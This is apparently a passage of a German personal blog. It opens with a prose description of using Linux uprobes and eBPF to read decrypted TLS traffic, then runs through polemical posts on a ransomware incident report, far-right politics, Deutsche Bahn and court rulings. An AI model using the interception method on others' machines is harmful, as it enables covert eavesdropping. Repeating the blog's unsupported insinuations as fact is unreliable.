Gut, also grundsätzlich könnte man den Kernel so umbauen, dass er beim Mappen von libssl.so.3 immer bei Offset 35660 einen Breakpoint setzt, und dann könnte man da die Daten abgreifen. Das ist aber eine Menge Gefummel und Kernel-Space-Programmierung ist sehr ungemütlich. Der kleinste Ausrutscher kann gleich die ganze Maschine crashen.
Warum erzähle ich das alles? Stellt sich raus: Muss man gar nicht. Ist alles schon im Kernel drin. Nennt sich uprobes und ist per Default angeschaltet. Da kann man über ein Config-File im /sys/-Tree dem Kernel sagen, man möchte gerne hier einen Breakpoint haben. Dann kann man per eBPF ein über Kernelversionen portables Kernelmodul hacken, das sich an die uprobe ranhängt und die Daten kopiert. Dann gibt es ein standardisiertes Interface dafür, wie man von dem eBPF-Modul die Daten wieder in den Userspace kopiert, wenn man das möchte.
Was hat man dann? Ein Tool, das in alle SSL-Verbindungen via OpenSSL auf der Maschine reingucken kann. Der Aufwand ist so gering, dass man das im Handumdrehen mit nur ein paar Zeilen Code auch auf gnutls erweitern kann, und auf NSS (die Mozilla-Library). Auch den TLS-Code von Go oder von Java kann man abfangen (Java ist etwas fummelig, da würde man vermutlich einen gemütlicheren Weg nehmen).
Gut, für das Eintragen der uprobe und für das Laden von dem eBPF muss man root sein. Es ist also kein Elevation of Privilege im herkömmlichen Sinne.
Aber es immanentisiert das Problem, das bis dahin bloß theoretisch war. Aus meiner Sicht heißt das, dass man ab jetzt keinem Kernel trauen kann, den man da nicht selbst hingetan hat. Mit anderen Worten: In jemand anderes Container laufen geht nicht.
Das war schon immer klar, aber jetzt ist es immanent. Was sage ich jetzt. Die Tools gibt es sogar schon seit mehreren Jahren. Ein SSL-Abgreif-Tool war das 2. Projekt, das auf diesen Frameworks gebaut wurde. Es sind sogar mehrere Tutorials und Beispielanwendungen online, wie man das macht.
Das nimmt mich gerade mehr mit als es sollte. Wir haben die Vertrauensfrage in der IT auf jeder Ebene verkackt. Der Hardware kann man schon länger nicht mehr trauen. Anderer Leute Software kann man schon länger nicht mehr trauen. Dass man Hypervisoren und Containern nicht trauen kann, ist auch schon immer klar, daher machen die ja dieses Affentheater mit "memory encryption", damit ihr euch in die Tasche lügen könnt, das sei schon nicht so schlimm. Doch. Doch, ist es.
Das könnte mich alles im Moment noch kalt lassen. Ich hacke alle meine Software selber (bis auf den Kernel), OpenSSL ist bei mir statisch reingelinkt (d.h. der Kernel sieht nicht, dass ich da eine Library lade, von der er die Offsets kennt). Man kann mit uprobes und ebpf immer noch meine Anwendungen ausspähen, aber dafür muss man die erstmal reverse engineeren und pro Anwendung die OpenSSL-Offsets raussuchen und eintragen. Das nimmt einem im Moment das Framework noch nicht ab. Aber ihr merkt hoffentlich selber, wie gering die Knautschzone hier ist. Meine Software läuft auf einer physischen Maschine, keinem vserver. Sagt der ISP. Ihr könnt euch mal mal selber fragen, wie sicher ihr euch seid, das selber nachprüfen zu können, wenn euch euer Dienstleister das verspricht.
Ich spoiler mal: Könnt ihr nicht.
Ich glaube, da muss ich mal einen Vortrag zu machen. Das ist alles sehr deprimierend, finde ich.

Sat Feb 3 2024

[l] Kennt ihr den schon? Edeka-Kette macht in Sachsen Werbung mit "Für Demokratie Gegen Nazis".
Man würde denken, dass das unkontrovers ist. Also nicht nur ein bisschen. Völlig. Absolut unkontrovers, würde man annehmen. Oder?
Nicht so in Sachsen. In Sachsen fühlten sich so viele Nazis angesprochen und shitstormten rum, dass die die Werbekampagne zurückziehen und sich entschuldigen mussten.
Ein Glück, dass die Nazis alle so blöde sind. Die haben gerade öffentlich bestätigt, dass sie Nazis sind, und es nicht mal gemerkt.
Money Quote ist von dem Chef der Kette, die das gemacht hatte:
Durch den Austausch mit unseren Kunden, habe ich gelernt, dass sich viel mehr Menschen mit dem Wort Nazi identifizieren, als ich dachte.
In der Tat. Als wir alle dachten, würde ich mal behaupten wollen.
Hey Sachsen, wollt ihr euch nicht mal abspalten? Vielleicht mit Ungarn zusammen tun oder so? Deren Staatsverständnis scheint euch ja näher zu liegen als unseres hier.
Ich habe mich jedenfalls lange nicht mehr so für mein Land geschämt wie jetzt gerade.
Update: Das ist übrigens auch eine der Forderungen der Freien Sachsen, die in dem Beitrag erwähnt wurden.

Fri Feb 2 2024

[l] Publicis zahlt $350 Mio, weil sie für Purdue Pharma irreführende Oxycontin-Werbung gemacht haben, das Opiat im Zentrum der Opiodenkrise in den USA.
Das finde ich ja mal großartig! Werbekokser können jetzt für irreführende Behauptungen zur Ader gelassen werden?! Fuck yeah!
Vielleicht wird 2024 doch nicht so scheiße.

Wed Jan 31 2024

[l] Wer dachte, die AfD geht jetzt mit der Narrenkappe in die Ecke und schämt sich, der hat seine Rechnung ohne die AfD Thüringen gemacht, die ernsthaft eine Aktuelle Stunde im Landtag abgeraumt hat. Thema:
Remigration aus Thüringen starten anstatt verteufeln
Die Wannseekonferenz 2.0 war übrigens deutlich näher an der AfD als es erst klang.
Nach Recherchen von WDR, NDR und Süddeutscher Zeitung (SZ) gibt es jedoch offenbar einen weiteren Teilnehmer aus Weidels Umfeld: Arne Friedrich Mörig, Sohn des Veranstalters dieses Treffens mit Rechtsextremen, Gernot Mörig.
Mörig junior wurde den Recherchen zufolge direkt aus Mitteln des AfD-Bundesvorstands bezahlt - und zwar aus dem persönlichen Budget, über das Weidel als Parteichefin direkt verfügen kann. Mörig hatte bei dem Treffen in Potsdam auch einen Vortrag über die Gründung einer neurechten Social-Media-Agentur gehalten.
War ja auch irgendwie klar, dass der braune Sumpf nicht weniger blubbert als die Sümpfe bei den anderen Parteien.

Fri Jan 26 2024

[l] Ich hab ja schon länger keinen Bock mehr, jeden dampfenden Ransomware-Scheißhaufen zu kommentieren, aber ab und zu muss ich. Denn wenn ich es nicht tue, fragt die Presse irgendwelche "Experten" und die sagen dann Dinge wie:
Der Angriff erfolgte in der Nacht zum 30.Oktober 2023 über den Zugang, mit dem auch die Kommunen und Kreise in das Netzwerk von Südwestfalen-IT gelangen. Diese so genannte "softwarebasierte VPN-Lösung" war nur mit einem einfachen Passwort gesichert.
"Die Südwestfalen-IT hat es den Angreifern sehr leicht gemacht", sagte IT-Experte Philipp Rothmann dem WDR. Üblich wäre hier eine "Multifaktor-Authentifizierung" gewesen, also eine Abfolge von mehreren Passwörtern. So aber mussten die Hacker nur lange genug verschiedene Varianten durchprobieren.
Das ist so falsch, dass nicht mal das Gegenteil stimmt. Glücklicherweise ist der Incident-Response-Bericht öffentlich, so kann man sich selbst ein Bild machen.
Punkt 1: Das war ein 0day! Da konnte man nichts machen!
Nope. Der Angriff war am 29. Oktober. für die Lücke gab es am 6. September einen Patch, an dem auch noch dranstand, dass das in der freien Wildbahn von Ransomware-Gangs genutzt worde. Das ist also das glatte Gegenteil von 0day.
2. ist das natürlich kein Problem, wenn jemand durch das VPN durchkommt, weil man ja die Security der Dienste dahinter so auslegt, als hingen sie mit nacktem Arsch im Internet. Das ist das Zero Trust, von dem ihr in den letzten Jahren so viel gehört habt. War hier offensichtlich nicht der Fall.
3. war der erste "Angriff" in dem CVE, dass man Accountnamen und Passwörter durchprobieren kann. Das sollte keine Rolle spielen, weil man ja extra aus dem Grund komplexe Passwörter vergibt. Und weil ein Accountname und ein Passwort noch nicht reicht, um sich dann damit auf irgendeinem Rechner zu authentisieren, nur beim VPN. Außer du warst so blöde und hast Single-Sign-On gemacht, aber das ist ja offensichtlich eine ganz furchtbare Idee, also macht das sicher keiner. Oder? ODER? Ich meine, so bekloppt kann man doch gar nicht sein, hoffe ich!
4. Mit einem gültigen Account konnte man sich dann im VPN als andere User anmelden. Sollte auch keine Auswirkungen haben, weil man ja Zero Trust macht und kein SSO hat. Außer man ist auffallend schlecht beraten und kann dann auf niemanden außer sich selber zeigen, wenn Ransomware vorbeikommt.
5. behauptet dieser "Experte" der Tagesschau, dass MFA geholfen hätte. Das ist natürlich Blödsinn. Wenn die Ransomware erst den Firmenlaptop eines Mitarbeiters kompromittiert, kann sie von dort die MFA-Anmeldung einfach mitbenutzen. MFA ist Compliance-Theater und dient hauptsächlich der Beweislastumkehr. Damit man sagen kann: Sehr her, wir hatten MFA, also war der User Schuld. Als ob der User sich Windows, Outlook und Active Directory ausgesucht hätte! Und in diesem Fall: Cisco-Produkte!
6. Ja, richtig gelesen. Active Directory. Völlig überraschend hatten die Angreifer noch am selben Tag Admin-Berechtigung im AD und haben sich dann ungestört im Netz ausgebreitet. Wie konnte das sein? Na weil niemand (auch nicht Microsoft selbst) Active Directory sicher konfiguriert kriegt.
6. Die hatten sogar multiple advanced next-gen endpoint security solutions im Einsatz, von Symantec und den Windows Defender. Hat ihnen beides nicht den Angriff vom Hals gehalten. Dabei macht Symantec explizit Werbung damit, dass sie vor 0days, Exploits und *papierraschel* Ransomware schützen! Und Defender macht sogar was mit "KI" in der Cloud!1!! Und trotzdem kamen die rein und konnten sich ungestört ausbreiten?! Das ist ja merkwürdig!1!! Ist ja fast so, als sei das bloß Schlangenöl?! Hätte uns doch nur jemand gewarnt!
Mich nervt ja vor allem, dass offenbar niemand verstanden hat, was 0day heißt. 0day heißt: Lücke dem Hersteller nicht bekannt, gibt keinen Patch und keine Warnung.
Das mit "gibt keine Warnung" ist bei Cisco natürlich immer Unfug. Wie oft soll ich denn noch vor deren Produkten warnen?!
Die versuchen hier mit 0day-Nebelkerzen die Schuld von sich abzulenken. Erfolglos. Genau niemand außer ihnen selbst trägt die Verantwortung. Immerhin hatten sie wohl Backups und haben kein Lösegeld gezahlt. Immerhin. Aber auch dann stellt sich die Frage, wieso das dann so große Auswirkungen haben konnte ("Die Arbeit dauert bis heute an"). Haben die das Szenario nie geübt?
Auch ansonsten haben die ziemlich großflächig verkackt. Laut Bericht stand das Domänen-Admin-Passwort im Klartext in der Group Policy, und zwar seit 2014.
Fallt also nicht auf Nebelkerzen mit Schlangenölgeschmack und 0day-Blablah rein.
Am Ende ist es immer dasselbe Muster. Ransomware kommt da rein, wo sie das System besser verstehen als der Betreiber. Wenn das Verständnisniveau der Betreiber also nicht so unglaublich schlecht wäre bei uns, hätten wir keine Ransomware-Problematik. (Danke, Max)

Wed Jan 24 2024

[l] Old and busted: AfD behauptet, Antifa würde Demo-Teilnehmern Demogeld bezahlen, weil sonst keiner demonstrieren kommen würde.
New hotness: AfD zahlt Demo-Teilnehmern 50 Euro Demogeld (die Meldung ist von 2018), weil sonst keiner demonstrieren kommen würde.
Mir tun ja die Satiriker leid.
Besonders geil ist ja, dass diese AfD-Legende der "Antifa GmbH", die Demogeld auszahlt, und natürlich mit Steuermitteln finanziert wird (weil, äh, natürlich wird sie das!!1!), so groß geworden ist, dass neulich auf Twitter die Antifa GmbH ihre Insolvenz bekanntgab angesichts der völlig überlaufenen Anti-Nazi-Demos. Da konnte selbst der Postillon nur unter größten Mühen noch was verstärken:
"Unsere Fotoabteilung arbeitet ja bereits erfolgreich mit KI, um die Menschenmassen in den Medien viel größer wirken zu lassen, als sie eigentlich sind", so der Antifa-Sprecher. "Dass die Personalabteilung dennoch diesen offenen Castingaufruf im Vorfeld gemacht hat, war rückblickend leider überzogen."
Den fand ich persönlich ja super, den Absatz. Aber der nächste ist auch sehr geil:
Nach der Pleite diskutiert die Ampel-Koalition nun, wie es weitergehen soll. Während sich SPD und Grüne für eine staatliche Nachfolgeorganisation im nächsten Haushaltsjahr einsetzen, wünscht die FDP eine Privatisierung mit mehreren konkurrierenden Antifa-Unternehmen, die eigenständig handeln.
*wieher*
Sehr schön auch, dass die AfD sich schon Gedanken gemacht hat. Was du selbst denkst und tust, das traust du auch den Anderen zu. Die wussten genau: Wenn die Antifa tatsächlich Demogeld zahlen würde, würden ihnen lauter Rechte mit Demogeld-Anträgen die Türen einrennen. Also haben sie selbst vorgebeugt, dass ihnen das nicht passieren kann:
Die ersten 30 Demonstranten erhalten 50 Euro: Die AfD in Rheinland-Pfalz will Teilnehmern einer Demonstration der Partei in Berlin einen Zuschuss zahlen. Insgesamt stünden dafür 1500 Euro zur Verfügung, sagte Parteisprecher Robin Classen in Mainz.
Lol, das Budget reicht für 30 Demonstranten? Das ist ja nicht mal eine Busladung! Also so wird das aber nichts mit "wir sind das Volk", liebe AfD. *schenkelklopf*
Oh, eine Frage habe ich noch an die AfD: Bestreitet ihr diese 1500 Euro aus Steuermitteln via Wahlkampferstattung?

Fri Jan 19 2024

[l] Videotipp: Life as the Last Fire Lookout.
In den 1910er Jahren gab es große Waldbrände in den USA, woraufhin das Forstamt angefangen hat, Aussichtstürme für Ranger zu bauen, die dann nach aufsteigendem Rauch Ausschau hielten, und Feuer meldeten, damit sie gelöscht werden konnten. Später hat man dann festgestellt, dass es nicht gut ist, wenn man Waldbrände ganz verhindert, und es gab bessere Methoden zur Waldbranddetektion, also sind diese Türme größtenteils abgerissen worden oder kaputtgegangen, aber ein paar stehen noch.
In dem Video besucht jemand einen dieser Türme in den Cascade Mountains und unterhält sich mit dem alten Mann, der dort wohnt. Dabei kriegen wir wunderschöne Panoramen zu sehen, die bei mir gerade ein großes Fernweh auslösen, weil ich in der Gegend auch schon Touren gemacht habe und ein bisschen herumgewandert bin. Für mich war das jedenfalls eines der schönsten Videos, die ich auf Youtube je gesehen habe. Vielleicht gefällt es euch ja auch. Ist bloß 18 Minuten lang.
Kennt jemand Werner Herzog persönlich? Für den wäre das vielleicht was.
*schwelg*

Fri Jan 12 2024

[l] PSA: Jemand hat bei Linux ASLR kaputtgemacht. Und es war diesmal kein Patch von Debian.
[l] Ebay muss eine Millionenstrafe zahlen.
Nachdem Mitarbeiter von Ebay die Verfasser eines Onlinenewsletters tyrannisiert hatten, zahlt die Onlineplattform eine Millionenstrafe und kommt für drei Jahre unter Aufsicht.
Tyrannisiert? Das ist aber ein starkes Wort. Was haben sie denn gemacht?
Zuvor waren sieben ehemalige Ebay-Beschäftigte dafür verurteilt worden, dass sie zur Einschüchterung unter anderem lebendige Kakerlaken sowie einen Trauerkranz und eine mit Kunstblut verschmierte Schweinemaske an das Blogger-Ehepaar verschickt hatten. Unter den anonym zugeschickten Artikeln war auch ein Ratgeberbuch über den Umgang mit dem Tod eines Partners gewesen.
o.O (Danke, Maximilian)
[l] In einem Leserbrief kam gerade eine Signatur rein, die mich Handlungsbedarf sehen lässt.
Es ging um ein Exzellenzzentrum in einem Nationalen Spitzencluster.
Das von Leitner-Institut für verteiltes Echtzeit-Java braucht ein Update, und zwar dringend!
Ab sofort handelt es sich daher um das von Leitner-Exzellenzzentrum für verteiltes Echtzeit-Java im Internationalen Agilitäts-Spitzencluster.
Wer sich schon länger mit Software-Engineering beschäftigt, wird wissen, dass so ein Cluster aus Klassenhierarchien in der Praxis einen Spitzenplatz einnimmt unter den Materialien mit dem stärksten strukturellen Zusammenhalt und der höchsten Intertialkraft.
Selbstverständlich streben wir eine führende Rolle auf der Clusterplattform Deutschland an und werden treibende Kraft bei Cluster4future werden. Wenn sich jemand mit Innovation auskennt, dann ja wohl wir!1!!
(Und wir haben uns immer über die Titelinflation bei den Amis lustig gemacht mit ihren ganzen Principal Senior Vice President for Coffee Machine Maintenance!)

Wed Jan 10 2024

[l] Rückblickend ist klar, was wir falsch gemacht haben.
Pirate Bay und Scihub hätten Milliarden an Risikokapital verbrennen müssen.
Dann wären sie heute legal. Wie OpenAI.
[l] Children now ‘biggest perpetrators of sexual abuse against children’.
Na ein Glück, dass wir unsere Kinder kriminalisiert haben. Da hat die Polizei endlich was für ihre Statistiken, und die Prüden können weiter Kinder für ihre Sünden in die Hölle verdammen und nackte Brüste aus dem Internet zensieren.
Wisst ihr, was wir jetzt brauchen? Altersverifikation bei Pornhub! Dann sind alle unsere Probleme gelöst!!
Ich frage mich ja langsam, ob das wie bei der Schwulenverfolgung ist. Dort haben sich der Reihe nach die härtesten Schwulenverfolger selbst als schwul herausgestellt.
Am Ende sind diese ganzen Pädo-Jäger selbst die krassesten Pädophilen und haben das nur zum Beruf gemacht, damit sie dafür sorgen können, nicht selbst verfolgt zu werden. Würde mich echt nicht mehr wundern.
Dass die "Jugendschützer" am Ende selber auf einen flotten Dreier stehen, hatten wir ja neulich erst.
Vielleicht sollte man die einfach mal zur Seite nehmen, die "Jugendschützer", und ihnen sagen, dass man Verständnis für ihren krassen Pornokonsum hat, und ihnen gerne helfen würde, das zu reduzieren. Die armen Opfer!

Mon Jan 8 2024

[l] Leserbrief zu den Bauernblockaden aus dem Feld:
Ich bin heute an mindestens 10 Blockaden in Sachsen und Brandenburg vorbeigefahren. Die Blockierer haben NUR die Auffahrt blockiert. An der Auffahrt konnte man vorbeifahren. Fahrzeuge wurden so gestellt, dass kein Chaos entstand. Es wurden Rettungsgassen freigehalten und einzelne Fahrzeuge wurden durchgelassen (welche kann ich nicht sagen, ich nehme mal an Pflegekräfte und Co.). Die Organisatoren haben sich also sehr wohl Gedanken über Notfalleinsätze und die Gefährdung von Leben gemacht. Und es waren nicht nur Bauern, sondern auch andere LKW von Fuhrunternehmen und Bau dabei.
Ich kann natürlich nicht für die Ballungszentren sprechen, aber was ich auf meinem Weg von Sachsen nach Berlin gesehen habe war ordentlicher Protest. Ich habe statt 2 Stunden Autobahn 3 h 15 min auf der Landstraße gebraucht. Das ist regelrecht harmlos.
Viele Autofahrer haben sich auch darauf eingestellt, so dass recht wenig Verkehr war.
Immer wenn ich die Autobahn gesehen habe war da nicht viel los, also gehe ich davon aus, dass nicht nur meine 10 Stichpunkte, sondern wohl ca 100% aller Auffahrten so blockiert waren. Also sehr wirkungsvoll.
Auch wenn es mich heute etwas mehr als 1 Stunde gekostet hat, ich bin nicht sauer.

Fri Jan 5 2024

[l] Heise ist da etwas GANZ heißem auf der Spur!
Ransomware: Nach der Erpressung folgt umgehend die nächste Erpressung
NEIN!!! Wenn wir unser Verhalten nicht ändern, lösen sich die Probleme nicht von selbst?! Das ist ja unglaublich, Bob!
Online-Kriminelle werden immer dreister und schlachten Opfer von Erpressungstrojanern gleich mehrfach aus.
Das ist ja dreist!!1!
Eigentlich dachte man ja früher mal, dass die Menschheit sich dadurch vom Tier unterscheidet, dass sie aus Fehlern lernen kann. Selbst aus Fehlern, die ein anderer Mensch gemacht hat. Aber wie sich rausstellt können wir nicht mal aus Fehlern lernen, die wir selbst gemacht haben.
[l] Niklaus Wirth ist gestorben. Ich suche seit ein paar Tagen nach den passenden Worten dazu. Ich habe ihn nie getroffen, aber meine erste richtige Programmiersprache war Pascal.
Seine spätere Arbeit mit Modula-2 und Oberon war sogar noch wichtiger, aber die hatten kein Turbo Pascal, die das populär gemacht hätten. Von Wirth kann man eine Menge lernen, und es gibt schöne Anekdoten über ihn.
Beispielsweise soll er als Regel formuliert haben, dass neue Optimizer-Passes nur in den Compiler eingebaut werden, wenn der Compiler, damit kompiliert, sich selber schneller kompilieren kann als ohne den zusätzlichen Code.
Er war einer der wenigen, die Ernst gemacht haben mit Code-Sparen. Nicht nur weil das effizienter und verständlicher wird, sondern weil mehr Code auch mehr Bugs heißt.
Sein Tod ist ein großer Verlust. Schon zu seinen Lebzeiten haben zu wenige Programmierer auf ihn gehört. Ich fürchte, dass das jetzt noch schlimmer wird. Sehr bedauerlich. RIP!

Sun Dec 31 2023

[l] Ich habe dieses Jahr keine Kongressseuche mitgenommen. Das ist glaube ich das erste Mal, dass ich nach dem Congress nicht erst mal ein paar Tage mit der Kongressseuche flachliege.
Das mag jetzt Projektion meiner Wunschträume und der Wunsch nach Confirmation Bias sein, aber ich glaube: Masken funktionieren.
Ich hatte ja einen kapitalen Fehler begangen, den meine besser informierten Kumpels nicht begangen haben: Ich hatte mir keine FFP3-Maske gekauft. Nicht weil die besser filtern, sondern weil die eine Aufhängung hinter dem Kopf haben, um den Kopf herum, und nicht an den Ohren hängen. Nach mehreren Stunden FFP2-Maske tragen taten mir ein bisschen die Ohren weh.
Das ist doof, weil das die Kosten-Nutzen-Rechnung verschiebt. Die Entscheidung, eine Maske zu tragen, ist ja, wie ich bei Tilo Jung ausführte, eine Abwägung zwischen "was ist der potentielle Schaden" und "wieviel kostet mich das jetzt". Wenn die Maske unbequem ist, ist man geneigt, den potentiellen Schaden, der ja jetzt gerade nicht sichtbar ist, weil er potentiell und in der Zukunft ist, weniger stark zu gewichten.
Am Ende habe ich dann zwischendurch halt ein paar Pausen gemacht, bin kurz rausgegangen (wo es leider immer sofort zu regnen anfing), oder habe mir eine leere Ecke in einem nicht öffentlichen Raum gesucht, wo wenig Luftbewegung und genug Abstand zu anderen Menschen war, und da die Maske abgenommen.
Nächstes Mal werde ich mir auch eine Maske mit hinter-dem-Kopf-Befestigung anschaffen.
Außerdem habe ich auf der Bühne bei meinen Vorträgen und für die Tilo-Jung-Aufnahme keine Maske getragen. Das senkt natürlich den Schutz der Maske, aber wenn man öffentlich zu vielen Leuten auf einmal spricht, muss man die Leute die Mundbewegungen sehen lassen. Das macht das Verständnis leichter und ist auch eine Frage der Barrierefreiheit.
Ihr werdet euch vielleicht an mein Tilo-Jung-Interview aus Leipzig erinnern, wo wir gar nicht im Bild waren sondern die Kamera bloß Ambience gefilmt hat. Ich hatte das gefordert und fand das auch voll geil, weil ich ja gerade möchte, dass es in den Videos nicht um mich geht sondern um die diskutierten Gedanken. Aber seit dem, vor allem wegen der Masken während Covid, ist mir klar geworden, wie viel des Zuhör-Verständnisses auch bei mir als nicht Hörgeschädigtem davon abhängt, dass ich die Lippenbewegungen sehen kann. Beim Masketragen gibt es auch noch eine das Verständnis erschwerende Degradierung des Audiosignals. Daher habe ich meine Risiko-Abwägung erweitert und beim Interview keine Maske getragen und erlaubt, dass sie meinen Kopf im Bild haben.
Update: Jetzt schreiben mir lauter Leute, dass es auch FFP2-Masken mit Hinterkopfhalter gibt, und dass es Möglichkeiten gibt, eine Hinterohrhalterung in eine Hinterkopfhalterung umzuwandeln. Mein Punkt war: Ich war nicht gut vorbereitet. :-)

Sat Dec 30 2023

[l] Steige gerade zuhause aus dem Zug, da kommt von Tilo die Mitteilung, dass unser Interview vom 37C3 oben ist.
Das alte Schlitzohr Tilo hat daraus jetzt einen Livestream gemacht (kriegt man dann mehr Anteile vom Youtube-Algorithmus?) :-)
Ich war wirklich schlimm durch und mein Nachschiebe-Vortrag war noch nicht gehalten, als wir das Interview aufnahmen, ich bitte also eventuell vorkommende Müdigkeits- und Verwirrungsanzeichen großzügig zu ignorieren. Auch stimmliche Abnutzungserscheinungen bitte ich zu entschuldigen, ich klinge da recht heiser finde ich.
Update: Ah, man muss da zwischen Live-Stream und "PREMIERE" unterscheiden, erklärt mir Tilo gerade. Das war eine Premiere, kein Live-Stream.
Update: Tilo sagt einem übrigens vorher nicht, welche Themen er ansprechen wird. Daher waren meine Angaben aus dem Gedächtnis und lagen schonmal daneben. Die Grippetoten pro Jahr sind zum Beispiel eher so 25.000 als die 100.000, die ich in Erinnerung hatte. Aber spielt ja eigentlich keine Rolle, ob das jetzt 25.000 oder 100.000 sind. Dass die Gesellschaft das einfach weggesteckt hat, bleibt bemerkenswert. Zum Vergleich: Verkehrstote pro Jahr sind so um die 2500, also ein Zehntel der Grippetoten.

Sun Dec 24 2023

[l] Hier kommt gerade ein sachdienlicher Hinweis zur Bahn rein:
Hi Felix,
keine Ahnung, ob ich der einzige bin, aber vielleicht lohnt sich das ja für eine Warnung: Ich bin seit ca. 8 Monaten stol... ich bin seit 8 Monaten Besitzer eines Deutschlandtickets. Mit diesem bin ich auch heute morgen mit dem Regionalexpress zu meiner Familie gefahren. Dachte ich zumindest.
Bei der Kontrolle stellt sich nämlich heraus, dass meine App gar kein Deutschlandticket angezeigt hat. Gut ausgeloggt, neu eingeloggt - kennt man bei der neuen Bahn-App ja. Immer noch nicht. App geschlossen, wie auf gemacht. Nix. Dann holen wir doch den Laptop raus und loggen uns auf bahn.de ein. Kein Deutschlandticket. Mir wird die Sache furchtbar unangenehm und ich sage zur Schaffnerin, dass ich nicht weiß, was da los ist und hole meinen Ausweis raus, weil ich kurz vor'm Aussteigen bin. Die Reaktion von ihr hat mich am meisten schockiert: "Ja, das passiert häufiger. Machen Sie sich demnächst zur Sicherheit einen Screenshot." Sie ließ mich dann aufgrund der Feiertage ziehen - offensichtlich sah ich schockiert genug aus, dass ich nicht wie ein Schwarzfahrer wirkte.
Ich bin jetzt hier bei der Familie und kann sicher sagen:
1. Ich habe kein Abo laut der Bahn.
2. Ich habe keine Kündigungsbestätigung oder ähnliches.
3. DBVertrieb hat zuletzt am 15.12.23 49,00 € für das Deutschland-Ticket bei mir abgebucht. Wie jeden Monat.
Mein Tipp an alle, die Bahnreisen: Macht einen Screenshot. Die App scheint mittlerweile so zuverlässig zu sein, wie der Rest der Bahn.
Ich habe gerade mal bei mir nachgeguckt und die Bahn-App wollte ein Neu-Login haben, damit sie sich an meine Bahncard erinnert. Das Deutschlandticket war auch weg, aber kam nach einem Refresh zurück.
Was machen die Leute hinter dieser App eigentlich beruflich?

Sun Dec 17 2023

[l] Der EuGH hat sich zu DSGVO-Schadensersatz geäußert.
War auch Zeit, finde ich. Nie war jemand Schuld, das war immer schlechtes Wetter und hochgradig kriminelle Energie von kriminellen Kriminellen. Höchste Zeit, dass der EuGH da mal Tacheles redet.
Hat er aber nicht. Es ging zwar ganz vielversprechend an:
Cyberkriminalität: Die Befürchtung eines möglichen Missbrauchs personenbezogener Daten kann für sich genommen einen immateriellen Schaden darstellen
Aber hier ist der Fall, um den es ging: In Bulgarien hatte das Finanzamt Besuch einer Ransomware-Gang und danach tauchten die personenbezogenen Daten der Bürger in einschlägigen Darkweb-Verkaufsstellen auf.
Daraufhin hatten mehrere Bürger geklagt und das oberste Verwaltungsgericht Bulgariens hat den EuGH gefragt, ob die Bürger jetzt nachweisen müssen, dass die Daten wirklich vom Finanzamt kamen, dass das Finanzamt da ihre Security verkackt hat, und ob da weitergehender Schaden entstanden ist (Identitätsdiebstahl o.ä.).
Die Frage hätte sich mir gar nicht gestellt. Wenn jemand im Darkweb einen Finanzamts-Datenreichtum verhökert, und da sind meine Daten drin, dann hätte sich mir die Frage gar nicht gestellt, ob das Finanzamt Schuld ist. Wer denn bitte sonst?!
Der EuGH sagt jetzt: Das Finanzamt kann nicht einfach behaupten, sie hätten alles richtig gemacht, und das sei schlechtes Wetter gewesen. Und du als Betroffener musst nicht nachweisen, dass jemand mit den Daten im Darkweb bei dir Schaden angerichtet hat.
Auf der anderen Seite sagt das Gericht aber auch, dass alleine aus der Tatsache, dass die Daten veröffentlicht wurden, nicht geschlossen werden kann, dass die Schutzmaßnahmen ungeeignet waren. Das müsse im Einzelfall geklärt werden.
In der Praxis wird das Finanzamt dann auf ihr Schlangenöl zeigen und sagen:
WiR hABeN aLleS GeTAn!1!!

Mon Dec 11 2023

[l] Neulich so: RWE kann den Gewinn mehr als verdoppeln.
Heute so: EU genehmigt Milliarden-Beihilfe an RWE.
Die Details sind fraktal aggressiv machend. Wieso hatten die denn hohe Gewinne (aus der alten Meldung)?
Der Energiekonzern RWE hat vor allem mit der Stromerzeugung aus Erneuerbaren Energien und dem LNG-Handel gute Geschäfte gemacht.
Nota Bene: Nicht mit den Kohlekraftwerken. Da ist die Marge nämlich eher gering. Wir erinnern uns: Die Stromkosten richten sich nach der teuersten Stromquelle, die vom Markt abgenommen wird. Solar und Wind ist billig, Kohle ist teuer. Den Profit fahren die also mit den Erneuerbaren ein, nicht mit Kohle.
RWE hat selber keinen Bock auf die Kohlekraftwerke! Daher ist das keine Entschädigung hier gerade. Der Schaden entsteht nicht durch die Abschaltung der Kohlekraftwerke, im Gegenteil! Das will RWE eigentlich selber alles abschalten. Diese Umstände führten zu diesem historischen "Zensor pinkeln"-Moment, als der RWE-Chef den Lindner kritisierte, der die Kohle doch nicht bis 2030 abgeschaltet sehen wollte. Der Lindner ist halt mal wieder zu blöde und kapiert die Details nicht. Kein Energieversorger will Kohlekraftwerke betreiben. Die wollen bloß, dass es irgendwo jemanden gibt, der noch eines betreibt, damit sie mehr Geld für ihre Erneuerbaren in den Arsch geblasen kriegen.
Die ARD hat die Details auch nicht verstanden, denn während oben in der Schlagzeile Beihilfe steht, steht unten im Kleingedruckten doch wieder Entschädigung. Denn natürlich lügen sich hier am Ende alle gegenseitig ins Gesicht, dass durch die Abschaltung ein Schaden entstünde, obwohl RWE das selber wollte.

Sat Dec 9 2023

[l] Cum-Ex-Olaf holt schon wieder das Brechmittel raus. Diesmal nicht für inhaftierte mutmaßliche Drogendealer sondern für uns alle.
Scholz: Mit der SPD kein Abbau des Sozialstaats
Sagt die Hartz-IV-Partei.
Der Sozialstaat sei eine der größten Errungenschaften, die Deutschland zustande gebracht habe. Er gehöre zur DNA, zum Selbstverständnis des Landes, dass niemand aufgegeben werde.
Bis auf die ganzen Obdachlosen unter der S-Bahn-Brücke, klar. Und die ganzen Rentner, die am Bahnhof die Mülleimer nach Pfandflaschen durchwühlen. Und die Kinder, deren Schulen ihr systematisch kaputtgespart habt.
In der Debatte über das Bürgergeld erinnerte Scholz daran, dass auch die Union dem Gesetz zugestimmt habe.
Ja. UND IHR VOLLVERSAGER. Ohne dass ihr eine Finanzierung hattet. Aber ist ja egal, machen wir einfach mehr Schulden. 100 Milliarden für die Bundeswehr haben wir ja auch einfach Schulden gemacht. Zahlen ja nicht wir ab. Zahlen unsere Kinder ab.
Aber das ist ja bei der SPD eh schon immer Programm. Mit Sozialstaat meinen sie für die Alten, die die SPD wählen. Seit die Jungen lieber Grüne wählen, können die mal alle sterben gehen.

Wed Dec 6 2023

[l] Endlich gibt es auch mal gute Nachrichten: Quad9 hat sich gegen die Contentmafia durchgesetzt. Die hatte durch mehrere Instanzen Quad9 zwingen wollen, in ihrem freien DNS-Resolver irgendwelche versifften Warez-Foren nicht aufzulösen.
Das OLG Dresden hat jetzt diesem ganzen Spuk ein Ende gemacht.
